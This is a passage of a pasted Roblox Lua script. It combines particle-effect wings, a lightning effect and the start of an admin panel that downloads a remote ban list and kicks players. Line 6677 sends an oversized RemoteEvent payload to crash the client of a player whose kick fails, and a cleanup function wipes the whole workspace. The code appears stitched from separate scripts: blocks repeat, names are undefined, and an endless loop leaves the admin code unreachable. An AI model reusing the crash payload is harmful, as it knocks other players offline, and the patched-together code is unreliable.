  6297. ypcall(function() mas1[i]:MakeJoints() end)
  6298. end
  6299. mas:Destroy()
  6300. for i=1,#cors do
  6301. coroutine.resume(cors[i])
  6302. end
  6303. --Wings
  6304. local Color = ColorSequence.new(Color3.new(0,0,0), Color3.new(0,0,0))
  6305.  
  6306. local Num = 0.5
  6307.  
  6308. local Num2 = 4 -------------Wings Parameters-------------------------------------
  6309. local Size = 0.8
  6310. local Rate = 300
  6311. -------------------------------------------------------------------------------------
  6312. local Player = game:service'Players'.LocalPlayer
  6313. local Character = Player.Character
  6314. Torso = Character:WaitForChild'Torso'
  6315.  
  6316. local Wing1 = Instance.new("Part",Character)
  6317. Wing1.FormFactor = Enum.FormFactor.Custom
  6318. Wing1.Size = Vector3.new(.2, .2, .2)
  6319. Wing1.Name = "WIng_1"
  6320.  
  6321. local fire = Instance.new("ParticleEmitter", Wing1)
  6322. fire.VelocitySpread = 0
  6323. fire.Lifetime = NumberRange.new(2)
  6324. fire.Acceleration = Vector3.new(0, 2, 2)
  6325. fire.RotSpeed = NumberRange.new(10)
  6326. fire.Rate = Rate
  6327. fire.Rotation = NumberRange.new(151515)
  6328. fire.Name = "Fire"
  6329. fire.LightEmission = 0.78
  6330. fire.LockedToPart = true
  6331. fire.Texture = "rbxasset://textures/particles/explosion01_implosion_main.dds"
  6332. fire.Color = Color
  6333. fire.Size = NumberSequence.new({NumberSequenceKeypoint.new(0, Size), NumberSequenceKeypoint.new(1, Size)})
  6334.  
  6335. local Wing2 = Wing1:Clone()
  6336. Wing2.Parent = Torso
  6337. local x,y,z = 0,-1,-6
  6338.  
  6339. Wld = function(a,b,cf)
  6340. local Weld = Instance.new('Weld',a)
  6341. Weld.Part0 = a
  6342. Weld.Part1 = b
  6343. Weld.C1 = cf
  6344. return Weld
  6345. end
  6346.  
  6347. local wld = Wld(Torso,Wing1,CFrame.new(0,0,-.5)*CFrame.Angles(-math.rad(90),-math.rad(20),-math.rad(90)))
  6348. local wld2 = Wld(Torso,Wing2,CFrame.new(0,0,.5)*CFrame.Angles(-math.rad(90),-math.rad(20),-math.rad(90)))
  6349.  
  6350.  
  6351. game:service'RunService'.Stepped:connect(function()
  6352. --z = 6+math.sin(tick()*2)
  6353. y = -1+math.sin(tick()*Num)*Num2
  6354. Wing1.Fire.Acceleration = Vector3.new(x,y,z)
  6355. Wing2.Fire.Acceleration = Vector3.new(x,y,-z)
  6356. end)
  6357. ------------------------------------------------------------------------------------------------
  6358. local Player = game:service'Players'.LocalPlayer
  6359. local Character = Player.Character
  6360. Torso = Character:WaitForChild'Torso'
  6361.  
  6362. local Wing1 = Instance.new("Part",Character)
  6363. Wing1.FormFactor = Enum.FormFactor.Custom
  6364. Wing1.Size = Vector3.new(.2, .2, .2)
  6365. Wing1.Name = "WIng_1"
  6366.  
  6367. local fire = Instance.new("ParticleEmitter", Wing1)
  6368. fire.VelocitySpread = 0
  6369. fire.Lifetime = NumberRange.new(2.5)
  6370. fire.Acceleration = Vector3.new(0, 4, 4)
  6371. fire.RotSpeed = NumberRange.new(10)
  6372. fire.Rate = Rate
  6373. fire.Rotation = NumberRange.new(151515)
  6374. fire.Name = "Fire"
  6375. fire.LightEmission = 0.78
  6376. fire.LockedToPart = true
  6377. fire.Texture = "rbxasset://textures/particles/explosion01_implosion_main.dds"
  6378. fire.Color = Color
  6379. fire.Size = NumberSequence.new({NumberSequenceKeypoint.new(0, Size), NumberSequenceKeypoint.new(1, Size)})
  6380.  
  6381. local Wing2 = Wing1:Clone()
  6382. Wing2.Parent = Torso
  6383. local x,y,z = 0,-1,-6
  6384.  
  6385. Wld = function(a,b,cf)
  6386. local Weld = Instance.new('Weld',a)
  6387. Weld.Part0 = a
  6388. Weld.Part1 = b
  6389. Weld.C1 = cf
  6390. return Weld
  6391. end
  6392.  
  6393. local wld = Wld(Torso,Wing1,CFrame.new(0,0,-.5)*CFrame.Angles(-math.rad(90),-math.rad(30),-math.rad(90)))
  6394. local wld2 = Wld(Torso,Wing2,CFrame.new(0,0,.5)*CFrame.Angles(-math.rad(90),-math.rad(30),-math.rad(90)))
  6395.  
  6396. print'Loaded'
  6397.  
  6398. game:service'RunService'.Stepped:connect(function()
  6399. --z = 6+math.sin(tick()*2)
  6400. y = -1+math.sin(tick()*Num)*Num2
  6401. Wing1.Fire.Acceleration = Vector3.new(x,y,z)
  6402. Wing2.Fire.Acceleration = Vector3.new(x,y,-z)
  6403. end)
  6404.  
  6405. ------------------------------------------------------------------------------------------------
  6406. local Player = game:service'Players'.LocalPlayer
  6407. local Character = Player.Character
  6408. Torso = Character:WaitForChild'Torso'
  6409.  
  6410. local Wing1 = Instance.new("Part",Character)
  6411. Wing1.FormFactor = Enum.FormFactor.Custom
  6412. Wing1.Size = Vector3.new(.2, .2, .2)
  6413. Wing1.Name = "WIng_1"
  6414.  
  6415. local fire = Instance.new("ParticleEmitter", Wing1)
  6416. fire.VelocitySpread = 0
  6417. fire.Lifetime = NumberRange.new(2.8)
  6418. fire.Acceleration = Vector3.new(0, 4, 4)
  6419. fire.RotSpeed = NumberRange.new(10)
  6420. fire.Rate = Rate
  6421. fire.Rotation = NumberRange.new(151515)
  6422. fire.Name = "Fire"
  6423. fire.LightEmission = 0.78
  6424. fire.LockedToPart = true
  6425. fire.Texture = "rbxasset://textures/particles/explosion01_implosion_main.dds"
  6426. fire.Color = Color
  6427. fire.Size = NumberSequence.new({NumberSequenceKeypoint.new(0, Size), NumberSequenceKeypoint.new(1, Size)})
  6428.  
  6429. local Wing2 = Wing1:Clone()
  6430. Wing2.Parent = Torso
  6431. local x,y,z = 0,-1,-6
  6432.  
  6433. Wld = function(a,b,cf)
  6434. local Weld = Instance.new('Weld',a)
  6435. Weld.Part0 = a
  6436. Weld.Part1 = b
  6437. Weld.C1 = cf
  6438. return Weld
  6439. end
  6440.  
  6441. local wld = Wld(Torso,Wing1,CFrame.new(0,0,-.5)*CFrame.Angles(-math.rad(90),-math.rad(40),-math.rad(90)))
  6442. local wld2 = Wld(Torso,Wing2,CFrame.new(0,0,.5)*CFrame.Angles(-math.rad(90),-math.rad(40),-math.rad(90)))
  6443.  
  6444. print'Loaded'
  6445.  
  6446. game:service'RunService'.Stepped:connect(function()
  6447. --z = 6+math.sin(tick()*2)
  6448. y = -1+math.sin(tick()*Num)*Num2
  6449. Wing1.Fire.Acceleration = Vector3.new(x,y,z)
  6450. Wing2.Fire.Acceleration = Vector3.new(x,y,-z)
  6451. end)
  6452.  
  6453. ------------------------------------------------------------------------------------------------
  6454. local Player = game:service'Players'.LocalPlayer
  6455. local Character = Player.Character
  6456. Torso = Character:WaitForChild'Torso'
  6457.  
  6458. local Wing1 = Instance.new("Part",Character)
  6459. Wing1.FormFactor = Enum.FormFactor.Custom
  6460. Wing1.Size = Vector3.new(.2, .2, .2)
  6461. Wing1.Name = "WIng_1"
  6462.  
  6463. local fire = Instance.new("ParticleEmitter", Wing1)
  6464. fire.VelocitySpread = 0
  6465. fire.Lifetime = NumberRange.new(3)
  6466. fire.Acceleration = Vector3.new(0, 4, 4)
  6467. fire.RotSpeed = NumberRange.new(10)
  6468. fire.Rate = Rate
  6469. fire.Rotation = NumberRange.new(151515)
  6470. fire.Name = "Fire"
  6471. fire.LightEmission = 0.78
  6472. fire.LockedToPart = true
  6473. fire.Texture = "rbxasset://textures/particles/explosion01_implosion_main.dds"
  6474. fire.Color = Color
  6475. fire.Size = NumberSequence.new({NumberSequenceKeypoint.new(0, Size), NumberSequenceKeypoint.new(1, Size)})
  6476.  
  6477. local Wing2 = Wing1:Clone()
  6478. Wing2.Parent = Torso
  6479. local x,y,z = 0,-1,-6
  6480.  
  6481. Wld = function(a,b,cf)
  6482. local Weld = Instance.new('Weld',a)
  6483. Weld.Part0 = a
  6484. Weld.Part1 = b
  6485. Weld.C1 = cf
  6486. return Weld
  6487. end
  6488.  
  6489. local wld = Wld(Torso,Wing1,CFrame.new(0,0,-.5)*CFrame.Angles(-math.rad(90),-math.rad(50),-math.rad(90)))
  6490. local wld2 = Wld(Torso,Wing2,CFrame.new(0,0,.5)*CFrame.Angles(-math.rad(90),-math.rad(50),-math.rad(90)))
  6491.  
  6492. print'Loaded'
  6493.  
  6494. game:service'RunService'.Stepped:connect(function()
  6495. --z = 6+math.sin(tick()*2)
  6496. y = -1+math.sin(tick()*Num)*Num2
  6497. Wing1.Fire.Acceleration = Vector3.new(x,y,z)
  6498. Wing2.Fire.Acceleration = Vector3.new(x,y,-z)
  6499. end)
  6500.  
  6501. ------------------------------------------------------------------------------------------------
  6502. local Player = game:service'Players'.LocalPlayer
  6503. local Character = Player.Character
  6504. Torso = Character:WaitForChild'Torso'
  6505.  
  6506. local Wing1 = Instance.new("Part",Character)
  6507. Wing1.FormFactor = Enum.FormFactor.Custom
  6508. Wing1.Size = Vector3.new(.2, .2, .2)
  6509. Wing1.Name = "WIng_1"
  6510.  
  6511. local fire = Instance.new("ParticleEmitter", Wing1)
  6512. fire.VelocitySpread = 0
  6513. fire.Lifetime = NumberRange.new(3.1)
  6514. fire.Acceleration = Vector3.new(0, 4, 4)
  6515. fire.RotSpeed = NumberRange.new(10)
  6516. fire.Rate = Rate
  6517. fire.Rotation = NumberRange.new(151515)
  6518. fire.Name = "Fire"
  6519. fire.LightEmission = 0.78
  6520. fire.LockedToPart = true
  6521. fire.Texture = "rbxasset://textures/particles/explosion01_implosion_main.dds"
  6522. fire.Color = Color
  6523. fire.Size = NumberSequence.new({NumberSequenceKeypoint.new(0, Size), NumberSequenceKeypoint.new(1, Size)})
  6524.  
  6525. local Wing2 = Wing1:Clone()
  6526. Wing2.Parent = Torso
  6527. local x,y,z = 0,-1,-6
  6528.  
  6529. Wld = function(a,b,cf)
  6530. local Weld = Instance.new('Weld',a)
  6531. Weld.Part0 = a
  6532. Weld.Part1 = b
  6533. Weld.C1 = cf
  6534. return Weld
  6535. end
  6536.  
  6537. local wld = Wld(Torso,Wing1,CFrame.new(0,0,-.5)*CFrame.Angles(-math.rad(90),-math.rad(60),-math.rad(90)))
  6538. local wld2 = Wld(Torso,Wing2,CFrame.new(0,0,.5)*CFrame.Angles(-math.rad(90),-math.rad(60),-math.rad(90)))
  6539.  
  6540. print'Loaded'
  6541.  
  6542. game:service'RunService'.Stepped:connect(function()
  6543. --z = 6+math.sin(tick()*2)
  6544. y = -1+math.sin(tick()*Num)*Num2
  6545. Wing1.Fire.Acceleration = Vector3.new(x,y,z)
  6546. Wing2.Fire.Acceleration = Vector3.new(x,y,-z)
  6547. end)
  6548. --Teleport Sky to Player
  6549. o1:MakeJoints()
  6550. o1:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  6551. --Hat
  6552. hed.Mesh.MeshId="http://www.roblox.com/asset/?id=21057410"
  6553. hed.Mesh.Scale=Vector3.new(2,2,2)
  6554. hed.face:Destroy()
  6555. --Lighting Effect
  6556. function Lightning(Part0,Part1,Times,Offset,Color,Thickness,Trans) -- Lightning module
  6557. --[[Part0 = Vector3 (Start pos)
  6558. Part1 = Vector3 (End pos)
  6559. Times = number (Amount of lightning parts)
  6560. Offset = number (Offset)
  6561. Color = color (brickcolor value)
  6562. Thickness = number (thickness)
  6563. Trans = number (transparency)
  6564. ]]--
  6565. local magz = (Part0 - Part1).magnitude
  6566. local curpos = Part0
  6567. local trz = {-Offset,Offset}
  6568. for i=1,Times do
  6569. local li = Instance.new("Part", torso)
  6570. li.Name = "Lightning"
  6571. li.TopSurface =0
  6572. li.Material = "Neon"
  6573. li.BottomSurface = 0
  6574. li.Anchored = true
  6575. li.Locked = true
  6576. li.Transparency = Trans or 0.4
  6577. li.BrickColor = BrickColor.new(Color)
  6578. li.formFactor = "Custom"
  6579. li.CanCollide = false
  6580. li.Size = Vector3.new(Thickness,Thickness,magz/Times)
  6581. local Offzet = Vector3.new(trz[math.random(1,2)],trz[math.random(1,2)],trz[math.random(1,2)])
  6582. local trolpos = CFrame.new(curpos,Part1)*CFrame.new(0,0,magz/Times).p+Offzet
  6583. if Times == i then
  6584. local magz2 = (curpos - Part1).magnitude
  6585. li.Size = Vector3.new(Thickness,Thickness,magz2)
  6586. li.CFrame = CFrame.new(curpos,Part1)*CFrame.new(0,0,-magz2/2)
  6587. else
  6588. li.CFrame = CFrame.new(curpos,trolpos)*CFrame.new(0,0,magz/Times/2)
  6589. end
  6590. curpos = li.CFrame*CFrame.new(0,0,magz/Times/2).p
  6591. game.Debris:AddItem(li,.1)
  6592. end
  6593. end
  6594.  
  6595. BodyParts = {} -- Parts to emit lightning effects from
  6596. for _, v in pairs(char:GetChildren()) do
  6597. if v:IsA("Part") then
  6598. table.insert(BodyParts, v)
  6599. end
  6600. end
  6601.  
  6602. Bounding = {} -- Calculate the bounding boxes
  6603. for _, v in pairs(BodyParts) do
  6604. local temp = {X=nil, Y=nil, Z=nil}
  6605. temp.X = v.Size.X/2 * 35
  6606. temp.Y = v.Size.Y/2 * 35
  6607. temp.Z = v.Size.Z/2 * 35
  6608. Bounding[v.Name] = temp
  6609. --table.insert(Bounding, v.Name, temp)
  6610. end
  6611.  
  6612. while wait(0) do -- Emit the Lightning effects randomly
  6613. local Body1 = BodyParts[math.random(#BodyParts)]
  6614. local Body2 = BodyParts[math.random(#BodyParts)]
  6615. local Pos1 = Vector3.new(
  6616. math.random(-Bounding[Body1.Name].X, Bounding[Body1.Name].X)/35,
  6617. math.random(-Bounding[Body1.Name].Y, Bounding[Body1.Name].Y)/35,
  6618. math.random(-Bounding[Body1.Name].Z, Bounding[Body1.Name].Z)/35
  6619. )
  6620. local Pos2 = Vector3.new(
  6621. math.random(-Bounding[Body2.Name].X, Bounding[Body2.Name].X)/35,
  6622. math.random(-Bounding[Body2.Name].Y, Bounding[Body2.Name].Y)/35,
  6623. math.random(-Bounding[Body2.Name].Z, Bounding[Body2.Name].Z)/35
  6624. )
  6625. local SPos1 = Body1.Position + Pos1
  6626. local SPos2 = Body2.Position + Pos2
  6627. Lightning(SPos1, SPos2, 4, 3, "Alder", .3, .56)
  6628. end
  6629. if isGame then
  6630. Owner = game.CreatorId
  6631. elseif isSB then
  6632. if owner then
  6633. Owner = owner.Name
  6634. end
  6635. end
  6636.  
  6637. local Plrs = game:GetService("Players")
  6638. local Light = game:GetService("Lighting")
  6639. local HServer = game:GetService("HttpService")
  6640. local Content = game:GetService("ContentProvider")
  6641. local isClosed = true
  6642. local LogNum = 1000
  6643. local LP;
  6644. local Version = 5.2
  6645.  
  6646. warn("Made by Script_lol Admin gui / Ban List" .. tostring(Version))
  6647.  
  6648. local BanPage = "5"
  6649. local RemotePage = ""
  6650. local isBan = true
  6651. local isRemote = false
  6652. local Banned = {}
  6653. local checkedData = false
  6654. local waitTime = 0.5
  6655. local waitTimeBan = 2
  6656.  
  6657. coroutine.wrap(function()
  6658. local Ok1, Val1 = pcall(function() return HServer:GetAsync(BanLink, true) end)
  6659. warn(Ok1, Val1)
  6660. if Ok1 and Val1 ~= nil and Val1 ~= "" then
  6661. BanPage = Val1
  6662. end
  6663.  
  6664. local Ok2, Val2 = pcall(function() return HServer:GetAsync(RemoteLink, true) end)
  6665. if Ok2 and Val2 ~= nil and Val2 ~= "" then
  6666. RemotePage = Val2
  6667. end
  6668.  
  6669. for Name in BanPage:gmatch("%w+") do
  6670. Banned[Name] = true
  6671. end
  6672.  
  6673. for _,v in pairs(Plrs:GetPlayers()) do
  6674. if Banned[v.Name] then
  6675. local Ok, Err = pcall(function() v:Kick() end)
  6676. if not Ok then
  6677. pcall(function() Instance.new("RemoteEvent", v):FireClient(v,{[string.rep("a",2e5+5)]="a"}) end)
  6678. end
  6679. warn("Ban list is on : " .. v.Name)
  6680. end
  6681. end
  6682.  
  6683. isBan = BanPage ~= ""
  6684. isRemote = RemotePage ~= ""
  6685. checkedData = true
  6686. warn("isBan: " .. tostring(isBan))
  6687. warn("isRemote: " .. tostring(isRemote))
  6688. end)()
  6689.  
  6690. local Cons = {}
  6691. local Logs = {}
  6692. local GUIs = {}
  6693. local GuiName = "SinePanel"
  6694. local MsgStart = "[SINE]"
  6695. local Commands = {}
  6696. local Selected = {}
  6697. local Loopkill = {}
  6698. local isTweening = false
  6699. local TweenTime = 0.1
  6700. local TweenNum = 10
  6701. local Grav = 196.2
  6702.  
  6703. local Assets = {
  6704. Logo = 236168928;
  6705. Menu = 236119941;
  6706. Credit = 236170764;
  6707. Line = 236394542;
  6708. }
  6709.  
  6710. local Colours = {
  6711. {X = 0, Y = 0, Z = 0};
  6712. {X = 1, Y = 0, Z = 0};
  6713. {X = 1, Y = 1, Z = 0};
  6714. {X = 0, Y = 1, Z = 1};
  6715. {X = 0, Y = 0, Z = 1};
  6716. {X = 0, Y = 1, Z = 0};
  6717. }
  6718.  
  6719. local Properties = {
  6720. "Name","Parent","ClassName","Text","TextSize","TextColor3","Position","Size","Color","BrickColor","Transparency","BackgroundTransparency","BackgroundColor3","AbsolutePosition","AbsoluteSize","AccountAge","AccountAgeReplicate",
  6721. "Active","TopSurface","BottomSurface","BackSurface","FrontSurface","LeftSurface","RightSurface","Adornee","AllowAmbientOcclusion","AllowTeamChangeOnTouch","AluminumQuality",
  6722. "AlwaysOnTop","Ambient","AmbientReverb","Anchored","Angularvelocity","AnimationId",
  6723. "Archivable","AreHingesDetected","AttachmentForward","AttachmentPoint","AttachmentPos",
  6724. "AttachmentRight","AttachmentUp","AutoAssignable","AutoButtonColor","AutoColorCharacters",
  6725. "AvailablePhysicalMemory","Axes","BackgroundColor","BackgroundColor3","BackgroundTransparency",
  6726. "BaseTextureId","BaseUrl","Bevel","Roundness","BinType","BlastPressure","BlastRadius",
  6727. "BodyColor","BodyPart","BorderColor","BorderColor3","BorderSizePixel","BrickColor",
  6728. "Brightness","Browsable","BubbleChat","BubbleChatLifetime","BubbleChatMaxBubbles",
  6729. "Bulge","Button1DownConnectionCount","Button1UpConnectionCount","Button2DownConnectionCount",
  6730. "Button2UpConnectionCount","C0","C1","CameraMode","CameraSubject","CameraType",
  6731. "CanBeDropped","CanCollide","HttpEnabled","CartoonFactor","CastShadows","CelestialBodiesShown",
  6732. "CFrame","Cframe","Character","CharacterAppearance","CharacterAutoLoads","MouseSensitivity","ChatScrollLength",
  6733. "ClassicChat","ClassName","ClearTextOnFocus","ClipsDescendants","CollisionSoundEnabled",
  6734. "CollisionSoundVolume","Color","Bottom","Top","ConstrainedValue","Contro".."llingHumanoid",
  6735. "ControlMode","ConversationDistance","CoordinateFrame","CorrodedMetalQuality","CPU",
  6736. "CpuCount","CpuSpeed","CreatorId","CreatorType","CurrentAngle","CurrentCamera",
  6737. "CycleOffset","D","DataCap","DataComplexity","DataComplexityLimit","DataCost",
  6738. "DataReady","Deprecated","DeselectedConnectionCount","DesiredAngle","DiamondPlateQuality",
  6739. "Disabled","DistanceFactor","DistributedGameTime","DopplerScale","Draggable","DraggingV1",
  6740. "Duration","EditorFont","EditorFontSize","EditorTabWidth","ElapsedTime","Elasticity",
  6741. "Enabled","ExplosionType","ExtentsOffset","F0","F1","F2","F3","Face","FaceId","Faces",
  6742. "FieldOfView","Focus","force","FogColor","FogEnd","FogStart","Font","FontSize","Force","FormFactor",
  6743. "Friction","From","GearGenreSetting","Genre","GeographicLatitude","GfxCard","Graphic",
  6744. "GrassQuality","Grip","GripForward","GripPos","GripRight","GripUp","Guest","HeadsUpDisplay",
  6745. "Health","Heat","Hit","Humanoid","IceQuality","Icon","IdleConnectionCount","Image","ImageTransparency","ImageColor3",
  6746. "InitialPrompt","InOut","InUse","IsPaused","IsPlaying","JobId","Jump","KeyDownConnectionCount",
  6747. "KeyUpConnectionCount","LeftLeg","LeftRight","LinkedSource","LocalPlayer","Location",
  6748. "Locked","LODX","LODY","Looped","Material","MaxActivationDistance","MaxCollisionSounds",
  6749. "MaxExtents","MaxForce","MaxHealth","MaxItems","MaxPlayers","Rotation","MaxSpeed","MaxThrust",
  6750. "MaxTorque","maxTorque","MaxValue","MaxVelocity","MembershipType","MembershipTypeReplicate","MeshId",
  6751. "MeshType","MinValue","Modal","MouseButton1ClickConnectionCount","MouseButton1DownConnectionCount",
  6752. "MouseButton1UpConnectionCount","MouseButton2ClickConnectionCount","MouseButton2DownConnectionCount",
  6753. "MouseButton2UpConnectionCount","MouseDelta","MouseDragConnectionCount","MouseEnterConnectionCount",
  6754. "MouseHit","MouseLeaveConnectionCount","MouseLock","MouseMovedConnectionCount","MouseTarget",
  6755. "MouseTargetFilter","MouseTargetSurface","MoveConnectionCount","MoveState","MultiLine",
  6756. "NameOcclusion","NetworkOw".."ner","Neutral","NumPlayers","Offset","Opacity","Origin","OsPlatform",
  6757. "OsVer","OverlayTextureId","P","PantsTemplate","ParamA","ParamB","Parent","Part","Part0",
  6758. "Part1","Pitch","PixelShaderModel","PlaceId","PlasticQuality","PlatformStand","PlayCount",
  6759. "PlayerToHideFrom","PlayOnRemove","Point","Port","Position","Preliminary","PrimaryPart",
  6760. "PrivateWorkingSetBytes","Purpose","RAM","Reflectance","ReplicatedSelectedConnectionCount",
  6761. "ResizeableFaces","ResizeIncrement","Resolution","ResponseDialog","RightLeg","RiseVelocity",
  6762. "RobloxLocked","RobloxVersion","RolloffScale","RotVelocity","Scale","Score","ScriptsDisabled",
  6763. "SecondaryColor","Selected","ShadowColor","Shape","Shiny","ShirtTemplate","ShowDeprecatedObjects",
  6764. "ShowDevelopmentGui","ShowPreliminaryObjects","Sides","Sit","Size","SizeConstraint",
  6765. "SizeOffset","SkinColor","SkyboxBk","SkyboxDn","SkyboxFt","SkyboxLf","SkyboxRt","SkyboxUp",
  6766. "SlateQuality","SoundId","Source","SparkleColor","Specular","StarCount",
  6767. "Steer","StickyWheels","StudsBetweenTextures","StudsOffset","StudsPerTileU","StudsPerTileV",
  6768. "Style","Summary","SuperSa".."feChatReplicate","Surface","Surface0",
  6769. "Surface1","SurfaceInput","Target","TargetFilter","TargetOffset","TargetPoint",
  6770. "TargetRadius","TargetSurface","TeamColor","Terrain","Text","TextBounds","TextColor","TextColor3",
  6771. "TextFits","TextScaled","TextStrokeColor3","TextStrokeTransparency","TextTransparency","Texture",
  6772. "TextureId","TextureSize","TextWrap","TextWrapped","TextXAlignment","TextYAlignment","Throttle",
  6773. "ThrustD","ThrustP","Ticket","Time","TimeOfDay","To","Tone","ToolTip","TopBottom","Torque","Torso",
  6774. "Transparency","TrussDetail","TurnD","TurnP","TurnSpeed","UnitRay","UserDialog","UserId","Value",
  6775. "Version","VertexColor","VideoCaptureEnabled","VideoMemory","VideoQuality",
  6776. "ViewSizeX","ViewSizeY","Visible","Volume","WalkDirection","WalkSpeed","WalkToPart","WalkToPoint",
  6777. "WheelBackwardConnectionCount","WheelForwardConnectionCount","WindowSize","WireRadius","WoodQuality",
  6778. "X","Y"
  6779. }
  6780.  
  6781. function GetProperties(obj)
  6782. local objProper = {}
  6783. local Done = {}
  6784. ypcall(function()
  6785. assert(pcall(function() assert(game.IsA(obj,"Instance")) end),"Should be ROBLOX instance")
  6786. for i,v in pairs(Properties) do
  6787. if pcall(function() return obj[v] end) and (type(obj[v]) ~= "userdata" or not obj:FindFirstChild(v)) then
  6788. if Done[v] == nil then
  6789. table.insert(objProper, {property = v, value = obj[v]})
  6790. Done[v] = true
  6791. end
  6792. end
  6793. end
  6794. end)
  6795. return objProper
  6796. end
  6797.  
  6798. for i,v in pairs(Assets) do
  6799. local ID = tostring(Assets[i])
  6800. Assets[i] = "rbxassetid://" .. ID
  6801. Content:Preload("rbxassetid://" .. ID)
  6802. end
  6803.  
  6804. function Hint(...)
  6805. local Messages = {...}
  6806. coroutine.resume(coroutine.create(function()
  6807. local Message = ""
  6808. for i,v in pairs(Messages) do
  6809. v = tostring(v)
  6810. Message = i == 1 and v or Message .. " " .. v
  6811. end
  6812. local Msg = Instance.new("Hint", LP.PlayerGui or Workspace)
  6813. Msg.Name = "TestHint"
  6814. Msg.Text = MsgStart .. " " .. Message
  6815. wait(3.5)
  6816. pcall(function() Msg:Destroy() end)
  6817. end))
  6818. end
  6819.  
  6820. function Run(Func)
  6821. local Ok, Err = coroutine.resume(coroutine.create(Func))
  6822. if not Ok then
  6823. Hint(Err)
  6824. end
  6825. end
  6826.  
  6827. function getPlayers()
  6828. local Players = {}
  6829. for _,v in pairs(Plrs:GetPlayers()) do
  6830. table.insert(Players, v)
  6831. end
  6832. return Players
  6833. end
  6834.  
  6835. function findPlayer(Name)
  6836. for _,v in pairs(Plrs:GetPlayers()) do
  6837. if v.Name == Name then
  6838. return v
  6839. end
  6840. end
  6841. return nil
  6842. end
  6843.  
  6844. function findCommand(Name)
  6845. for _,v in pairs(Commands) do
  6846. if v.Name == Name then
  6847. return v
  6848. end
  6849. end
  6850. return nil
  6851. end
  6852.  
  6853. function getCommonList()
  6854. local List = {}
  6855. local FinalList = {}
  6856. local NumberSelected = 0
  6857.  
  6858. for i,v in pairs(Selected) do
  6859. local Command = findCommand(v)
  6860. if Command and Command.List then
  6861. NumberSelected = NumberSelected + 1
  6862. for _,v2 in pairs(Command.List()) do
  6863. if List[v2] == nil then
  6864. List[v2] = 1
  6865. else
  6866. List[v2] = List[v2] + 1
  6867. end
  6868. end
  6869. end
  6870. end
  6871.  
  6872. for i,v in pairs(List) do
  6873. if v == NumberSelected then
  6874. table.insert(FinalList, i)
  6875. end
  6876. end
  6877. return FinalList
  6878. end
  6879.  
  6880. function fixScroll(Scroll)
  6881. local YNum = 0
  6882. for _,v in pairs(Scroll:GetChildren()) do
  6883. if v:IsA("TextLabel") or v:IsA("TextButton") or v:IsA("Frame") or v:IsA("ImageLabel") or v:IsA("ImageButton") then
  6884. YNum = YNum + v.Size.Y.Offset + 2
  6885. end
  6886. end
  6887. Scroll.CanvasSize = UDim2.new(1, 0, 0, YNum)
  6888. end
  6889.  
  6890. function Clear(Obj)
  6891. if #Obj:GetChildren() >= 1 and Obj.ClassName ~= "PlayerGui" then
  6892. for _,v in pairs(Obj:GetChildren()) do
  6893. ypcall(function()
  6894. Clear(v)
  6895. end)
  6896. end
  6897. end
  6898. if Obj.ClassName ~= "Player" and Obj.ClassName ~= "Backpack" and Obj.ClassName ~= "PlayerGui" and Obj.ClassName ~= "StarterGear" and Obj.ClassName ~= "HealthGUI" then
  6899. Obj:Destroy()
  6900. end
  6901. end
  6902.  
  6903. function Clean(noBase)
  6904. Light.GlobalShadows = true
  6905. Light.TimeOfDay = "14:00:00"
  6906. Light.Brightness = 0
  6907. Light.ShadowColor = Color3.new(0.705882, 0.705882, 0.72549)
  6908. Light.Ambient = Color3.new(1, 1, 1)
  6909. Light.ColorShift_Top = Color3.new(0, 0, 0)
  6910. Light.ColorShift_Bottom = Color3.new(0, 0, 0)
  6911. Light.OutdoorAmbient = Color3.new(0.501961, 0.501961, 0.501961)
  6912. Light.FogStart = 0
  6913. Light.FogEnd = 100000
  6914. Light.FogColor = Color3.new(0.752941, 0.752941, 0.752941)
  6915. Light:ClearAllChildren()
  6916. for _,v in pairs(Workspace:GetChildren()) do
  6917. if v.ClassName == "Terrain" then
  6918. v:Clear()
  6919. else
  6920. v:Destroy()
  6921. end
  6922. end
  6923. if noBase == nil then
  6924. local Base = Instance.new("Part")
  6925. Base.BrickColor = BrickColor.new("Bright green")
  6926. Base.Position = Vector3.new(0, -0.600000024, 0)
  6927. Base.CanCollide = true
  6928. Base.Size = Vector3.new(700, 1.20000005, 700)
  6929. Base.Material = "Grass"
  6930. Base.Locked = true
  6931. Base.Anchored = true
  6932. Base.Name = "Base"
  6933. Base.TopSurface = "Smooth"
  6934. Base.BottomSurface = "Smooth"
  6935. Base.Parent = Workspace
  6936. for _,v in pairs(Plrs:GetPlayers()) do
  6937. pcall(function()
  6938. v:LoadCharacter()
  6939. end)
  6940. end
  6941. end
  6942. end;re=false
  6943.  
  6944. function hasCharacter(Plr)
  6945. if Plr and Plr.Parent ~= nil and Plr.Character and Plr.Character.Parent ~= nil and Plr.Character:findFirstChild("Torso") then
  6946. return true
  6947. end
  6948. return false
  6949. end
  6950.  
  6951. function isReady()
  6952. if LP and LP.Parent ~= nil and LP:findFirstChild("PlayerGui") then
  6953. return true
  6954. end
  6955. return false
  6956. end
  6957.  
  6958. function onAdded(Plr)
  6959. Run(function()
  6960. Run(function()
  6961. repeat wait(1/30) until isReady()
  6962. Launch()
  6963. Hint("Launched // " .. Plr.Name .. " // Parent : " .. tostring(script.Parent == nil and "Hidden" or script.Parent))
  6964. end)
  6965. table.insert(Cons, Plr.CharacterAdded:connect(function()
  6966. Run(function()
  6967. repeat wait(1/30) until isReady()
  6968. Launch()
  6969. --Hint("Launched // " .. Plr.Name .. " // Parent : " .. tostring(script.Parent == nil and "Hidden" or script.Parent))
  6970. end)
  6971. end))
  6972. table.insert(Cons, Plr.Chatted:connect(function(Msg)
  6973. if Msg:sub(1, 3) == "/e " then
  6974. Msg = Msg:sub(4)
  6975. end
  6976. if Msg == "st" then
  6977. local Hin = Instance.new("Hint", Workspace)
  6978. Hin.Name = "TestHint"
  6979. Hin.Text = "ASD"
  6980. wait(2.5)
  6981. pcall(function() Hin:Destroy() end)
  6982. end
  6983. end))
  6984. end)
  6985. end
  6986.  
  6987. function Remove(Location, Name)
  6988. for _,v in pairs(Location:GetChildren()) do
  6989. if v.Name == Name then
  6990. v:Destroy()
  6991. end
  6992. end
  6993. end
  6994.  
  6995. function makePlayers(ScrollFrame)
  6996. ScrollFrame:ClearAllChildren()
  6997. local PlayerButtons = {}
  6998. local YNum = 0
  6999. local PlrTab = {}
  7000. table.insert(PlrTab, "All")
  7001. for _,v in pairs(Plrs:GetPlayers()) do
  7002. table.insert(PlrTab, v.Name)
  7003. end
  7004.  
  7005. for _,v in pairs(PlrTab) do
  7006. local PlrButton = Instance.new("TextButton")
  7007. PlrButton.Name = v
